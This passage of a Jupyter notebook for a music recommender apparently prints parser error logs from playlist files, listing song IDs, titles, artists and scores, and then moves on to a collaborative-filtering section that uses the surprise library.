壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28059284:::Earth: The Oldest Computer (The Last Night) (feat. 
Macklemore)\n\nFormatError..\n:::Childish Gambino:::20.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27533077:::夢を抱いて~はじまりのクリスロード~ (instrumental)\n\nFormatError..\n - instrumental:::Rake:::35.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n22773056:::ODIN SPHERE’s Theme-Shanachie ver.-【エンディング】\n\nFormatError..\n:::崎元仁:::15.0\n\nFormatError..\n32408314:::\n\nFormatError..\nKishinjou set 03 ~ 運河を行き交う人妖:::凛:::20.0\n\nFormatError..\n32408315:::\n\nFormatError..\nKishinjou set 04 ~ 柳の下のデュラハン:::凛:::15.0\n\nFormatError..\n32408321:::\n\nFormatError..\nKishinjou set 09 ~ 空中に沈む輝針城:::凛:::5.0\n\nFormatError..\n32408322:::\n\nFormatError..\nKishinjou set 10 ~ リバースイデオロギー:::凛:::20.0\n\nFormatError..\n32408323:::\n\nFormatError..\nKishinjou set 11 ~ 針小棒大の天守閣:::凛:::15.0\n\nFormatError..\n32408324:::\n\nFormatError..\nKishinjou set 12 ~ 輝く針の小人族:::凛:::20.0\n\nFormatError..\n32408328:::\n\nFormatError..\nKishinjou set 16 ~ 不思議な不思議な道具達:::凛:::5.0\n\nFormatError..\n32408334:::\n\nFormatError..\nAmanojaku set 00 ~ 反則の狼煙を上げろ:::凛:::5.0\n\nFormatError..\n32408335:::\n\nFormatError..\nAmanojaku set 01 ~ 不可能弾幕には反則を:::凛:::15.0\n\nFormatError..\n32408338:::\n\nFormatError..\nAmanojaku set 03 ~ ロマンチック逃飛行:::凛:::15.0\n\nFormatError..\n32408339:::\n\nFormatError..\nAmanojaku set 04 ~ 永遠の三日天下:::凛:::15.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::60.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n26878881:::\n\nFormatError..\nWolfgang Amadeus Mozart: Serenata notturna in D, K.239 - 2. Menuetto - Trio:::Herbert von Karajan:::15.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27582794:::\n\nFormatError..\n丑三つ時の里:::黄昏フロンティア:::25.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n27582794:::\n\nFormatError..\n丑三つ時の里:::黄昏フロンティア:::25.0\n\nFormatError..\n543634:::江南の大国・呉の参戦\n\nFormatError..\n:::横山菁児:::60.0\n\nFormatError..\n28059284:::Earth: The Oldest Computer (The Last Night) (feat. 
Macklemore)\n\nFormatError..\n:::Childish Gambino:::20.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n5157818:::Divertimento in D, K.334 - 3. Menuetto - Trio - \n\nFormatError..\nMenuetto:::Wiener MozartEnsemble:::20.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n31704021:::\n\nFormatError..\nTe Iria A Buscar:::DatPhoria:::15.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n31654791:::\n\nFormatError..\nEuropean Intrigue:::Tim Wynn:::45.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n4470537:::Би дуртай \n\nFormatError..\nTs.Khulan\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nBi durtai:::Hurd:::55.0\n\nFormatError..\n4470518:::Яг л чам шиг \n\nFormatError..\nSükhzorig\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nYag l cham shig:::Hurd:::40.0\n\nFormatError..\n4470529:::Намуухан орчлон \n\nFormatError..\nT.Erdenetsogt\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nNamuukhan orchlon:::Hurd:::65.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? 
(collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28576609:::\n\nFormatError..\nロビンとフランキーとブルック ~軍隊蟻たちの狙い~:::浜口史郎:::20.0\n\nFormatError..\n28576630:::\n\nFormatError..\nベイビーダンス ~ダンスは求愛の印?~:::田中公平:::20.0\n\nFormatError..\n28576624:::\n\nFormatError..\n先制攻撃 ~鼓動のボリュームを上げろ!~ :::浜口史郎:::25.0\n\nFormatError..\n28576631:::\n\nFormatError..\nシキ ナミをあきらめる ~ルフィ登場~:::浜口史郎:::20.0\n\nFormatError..\n28576623:::\n\nFormatError..\n最後の戦い ~渾身の巨人の雷斧(ギガント・トールアックス)~:::浜口史郎:::50.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n687792:::Eternal Rite (Switch Remix)\n\nFormatError..\n(幽雅に咲かせ、墨染の桜 ~ Border of Life/东方妖々梦より):::Alstroemeria Records:::10.0\n\nFormatError..\n27582794:::\n\nFormatError..\n丑三つ時の里:::黄昏フロンティア:::25.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n1512368:::listen\n\nFormatError..\n11. Concerto in F minor for Violin, String Orchestra and Continuo, Op. 8, No. 4, RV 297,L'inverno(Winter): II. Largo:::Joshua Bell:::20.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n33497925:::\n\nFormatError..\nFrédéric Chopin: Etude for piano No. 23 in A minor, Op. 25/11, CT. 36:::Jorge Bolet:::70.0\n\nFormatError..\n28482246:::トップをねらえ!予告編集(完全版)0話\n\nFormatError..\n:::田中公平:::50.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n5157818:::Divertimento in D, K.334 - 3. 
Menuetto - Trio - \n\nFormatError..\nMenuetto:::Wiener MozartEnsemble:::20.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n4470537:::Би дуртай \n\nFormatError..\nTs.Khulan\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nBi durtai:::Hurd:::55.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n28122491:::Samhradh Samhradh\n\nFormatError..\n:::The Gloaming:::5.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::60.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n1512377:::listen\n\nFormatError..\n13. Sonata in G minor for Violin and Basso Continuo,Devil's Trill Sonata:::Joshua Bell:::5.0\n\nFormatError..\n25731912:::SONATA No.1 en Si b Mayor, RV.47 Largo Allegro\n\nFormatError..\n :::Paul Tortelier:::70.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n17742280:::\n\nFormatError..\nJohann Sebastian Bach: Prelude and Fugue in C sharp (WTK, Book, No.3), BWV 848 - Prelude:::Friedrich Gulda:::25.0\n\nFormatError..\n31654791:::\n\nFormatError..\nEuropean Intrigue:::Tim Wynn:::45.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n401386160:::\n\nFormatError..\n when you think about her and your brain says no don't do that:::In Love With A Ghost:::55.0\n\nFormatError..\n5090113:::Praia Brava歌手\n\nFormatError..\nMiraflores:::Various Artists:::10.0\n\nFormatError..\n725347:::fortissimo-the ultimate crisis- (instrumental)\n\nFormatError..\n:::fripSide:::50.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n427373827:::Champions (From \"Hands of Stone\") \n\nFormatError..\n:::Usher:::30.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n26902203:::What’s your name? 
(collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n461124237:::\n\nFormatError..\nECHO (LET GO) (Max Styler Extended Remix):::Breathe Carolina:::20.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n17742280:::\n\nFormatError..\nJohann Sebastian Bach: Prelude and Fugue in C sharp (WTK, Book, No.3), BWV 848 - Prelude:::Friedrich Gulda:::25.0\n\nFormatError..\n1375664:::Suite No. 3 In G Minor, BWV 808 IV. Sarabande - Les Agréments De La Même Sarabande\n\nFormatError..\n:::Glenn Gould:::20.0\n\nFormatError..\n31477705:::\n\nFormatError..\nJohann Sebastian Bach: Goldberg Variations, BWV 988 - Variation 9 Canone alla Terza:::Elena Barshai:::20.0\n\nFormatError..\n31477724:::\n\nFormatError..\nJohann Sebastian Bach: Goldberg Variations, BWV 988 - Variation 27 Canone alla Nona:::Elena Barshai:::15.0\n\nFormatError..\n33190071:::Theme of Blood Blockade Battlefront\n\nFormatError..\n:::岩崎太整:::65.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n27704949::: \n\nFormatError..\n투명인간 (feat. 있다) (prod. The Quiett):::Fana:::5.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n32408897:::\n\nFormatError..\n星空から来た少女:::Elements Garden:::20.0\n\nFormatError..\n3696073:::George Murphy\n\nFormatError..\nTrack:::Tom Lehrer:::5.0\n\nFormatError..\n4964484:::\n\nFormatError..\n魔物退治に、お力を貸して頂けますか:::松来未佑:::60.0\n\nFormatError..\n4964487:::頑張ってください。これ、お守りです\n\nFormatError..\n:::松来未佑:::60.0\n\nFormatError..\n4964470:::ウェルカム。あの、ようこそ練馬へ\n\nFormatError..\n:::松来未佑:::20.0\n\nFormatError..\n427142111:::ウタカタ \n\nFormatError..\n(原曲: ミストレイク):::Re:Volte:::25.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n27591065:::Sonate für Klavier h-moll S 178 - Lento\n\nFormatError..\n:::Alfred Brendel:::15.0\n\nFormatError..\n404184640:::사랑해요(I Love You)\n\nFormatError..\n(inst.):::金泰妍:::65.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n31704017:::\n\nFormatError..\nEverything I Need:::DatPhoria:::20.0\n\nFormatError..\n26878881:::\n\nFormatError..\nWolfgang Amadeus Mozart: Serenata notturna in D, K.239 - 2. 
Menuetto - Trio:::Herbert von Karajan:::15.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n3049811:::O Meu Amo/Participacão de Alcione\n\nFormatError..\n:::Maria Bethânia:::5.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n28797112:::あるがまま\n\nFormatError..\n:::アナム&マキ:::25.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n31654811:::\n\nFormatError..\nAmerican Cowboys:::Tim Wynn:::65.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26158540:::\n\nFormatError..\n窓辺にもたれる少女 アコースティックギター ver. 
- unplug:::菊地創:::40.0\n\nFormatError..\n33241159:::The End (Culture Code Remix)\n\nFormatError..\n:::Aruna:::20.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n4470529:::Намуухан орчлон \n\nFormatError..\nT.Erdenetsogt\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nNamuukhan orchlon:::Hurd:::65.0\n\nFormatError..\n4470555:::Зүйрлэх аргагүй \n\nFormatError..\nKh.Chilaajav\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nZüirlekh argagüi:::Hurd:::25.0\n\nFormatError..\n4470524:::Алт \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nAlt:::Hurd:::20.0\n\nFormatError..\n4470542:::Цоглог оюутан \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nTsoglog oyutan:::Hurd:::25.0\n\nFormatError..\n4470526:::Зөрөөд өнгөрсөн бүсгүй \n\nFormatError..\n \n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nZörööd öngörsön büsgüi:::Hurd:::25.0\n\nFormatError..\n4470515:::Энд нэг л биш ээ \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nEnd neg l bish ee:::Hurd:::25.0\n\nFormatError..\n4470533:::Ер бусын сүм \n\nFormatError..\nT.Erdenetsogt\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nYer busyn süm:::Hurd:::20.0\n\nFormatError..\n4470559:::Нүүдлийн кино театр \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nNüüdliin kino teatr:::Hurd:::25.0\n\nFormatError..\n4470521:::Зэвүүн харц \n\nFormatError..\nB.Oidov, P.Kherlen\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nZevüün kharts:::Hurd:::20.0\n\nFormatError..\n4470551:::Тоотой санагдах юм \n\nFormatError..\nKh.Purev\n\nFormatError..\nS.Ishkhüü\n\nFormatError..\nTootoi sanagdakh yum:::Hurd:::25.0\n\nFormatError..\n4470547:::Би амьдарч чадна \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nBi am'darch chadna:::Hurd:::20.0\n\nFormatError..\n4470518:::Яг л чам шиг \n\nFormatError..\nSükhzorig\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nYag l cham shig:::Hurd:::40.0\n\nFormatError..\n4470571:::Хөгшин атаман \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nKhögshin ataman:::Hurd:::20.0\n\nFormatError..\n4470537:::Би дуртай \n\nFormatError..\nTs.Khulan\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nBi durtai:::Hurd:::55.0\n\nFormatError..\n4470565:::Хонгор сэтгэл \n\nFormatError..\nB.Bayandalai\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nKhongor setgel:::Hurd:::30.0\n\nFormatError..\n461231833:::Yiruma: River Flows In You\n\nFormatError..\n:::黄旭洋:::40.0\n\nFormatError..\n26902203:::What’s your name? 
(collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n31311586:::Cameltoe(Original Mix)\n\nFormatError..\n:::Rolvario:::15.0\n\nFormatError..\n401386160:::\n\nFormatError..\n when you think about her and your brain says no don't do that:::In Love With A Ghost:::55.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n33241159:::The End (Culture Code Remix)\n\nFormatError..\n:::Aruna:::20.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27591798:::THIS ILLUSION (inst. 2012 remaster)\n\nFormatError..\n - instrumental:::深澤秀行:::20.0\n\nFormatError..\n22673328:::HaruHaru -Japanese Version- (Bonus Track)\n\nFormatError..\n:::BIGBANG:::80.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n654309:::1. ヴァイオリン协奏曲 ホ短调 作品64 第1楽章:Allegro molto appassionato\n\nFormatError..\n试聴する:::诹访内晶子:::15.0\n\nFormatError..\n654316:::2. ヴァイオリン协奏曲 ホ短调 作品64 第2楽章:Andante\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654321:::3. ヴァイオリン协奏曲 ホ短调 作品64 第3楽章:Allegretto non troppo-Allegro molto vivace\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654327:::4. ヴァイオリン协奏曲 ニ长调 作品35 第1楽章:Allegro moderato\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654333:::5. ヴァイオリン协奏曲 ニ长调 作品35 第2楽章:Canzonetta:Andante\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654338:::6. ヴァイオリン协奏曲 ニ长调 作品35 第3楽章:Finale:Allegro vivacissimo\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n27465106:::Can\n\nWall time: 11.5 s\n"
],
[
"%time parse_file(\"./RawData/popular.playlist\",\"./InternalData/6_popular_playlist.pkl\",\"./InternalData/7_popular_song.pkl\")",
"FormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n424496188:::大王叫我来巡山 - (原唱:\n\nFormatError..\n 贾乃亮/贾云馨):::流浪的蛙蛙:::65.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n427373827:::Champions (From \"Hands of Stone\") \n\nFormatError..\n:::Usher:::30.0\n\nFormatError..\n31654811:::\n\nFormatError..\nAmerican Cowboys:::Tim Wynn:::65.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nWall time: 722 ms\n"
]
],
[
[
"### 4 使用协同过滤建模并进行预测\n#### 使用surprise 自带的movielens 数据集",
"_____no_output_____"
]
],
[
[
